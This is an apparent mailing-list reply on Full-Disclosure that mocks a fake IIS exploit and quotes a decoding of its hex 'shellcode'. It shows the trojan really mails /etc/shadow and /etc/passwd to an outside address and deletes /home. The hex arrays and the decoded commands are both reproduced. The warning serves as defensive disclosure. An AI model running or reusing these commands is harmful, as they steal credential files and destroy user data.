<sarcasm>Wait, you mean if I run that, I can hack IIS?</sarcasm> ^_^
> Not that anyone would fall for running this on > anything besides a test > system, but to save 30 second to decode, what it > really does (locally, > not remotely) is: > > cat /etc/shadow |mail > [email protected] > cat /etc/passwd |mail > [email protected] > /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe > > -----Original Message----- > > */ > char shellcode[] = > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > "\x72\x3b\x65\x63\x68\x6f\x20\x62" > "\x6c\x34\x63\x6b\x68\x34\x74\x2c" > "\x68\x65\x68\x65"; > > char launcher [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > char netcat_shell [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __________________________________ Do you Yahoo!? Plan great trips with Yahoo! Travel: Now over 17,000 guides! http://travel.yahoo.com/p-travelguide _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
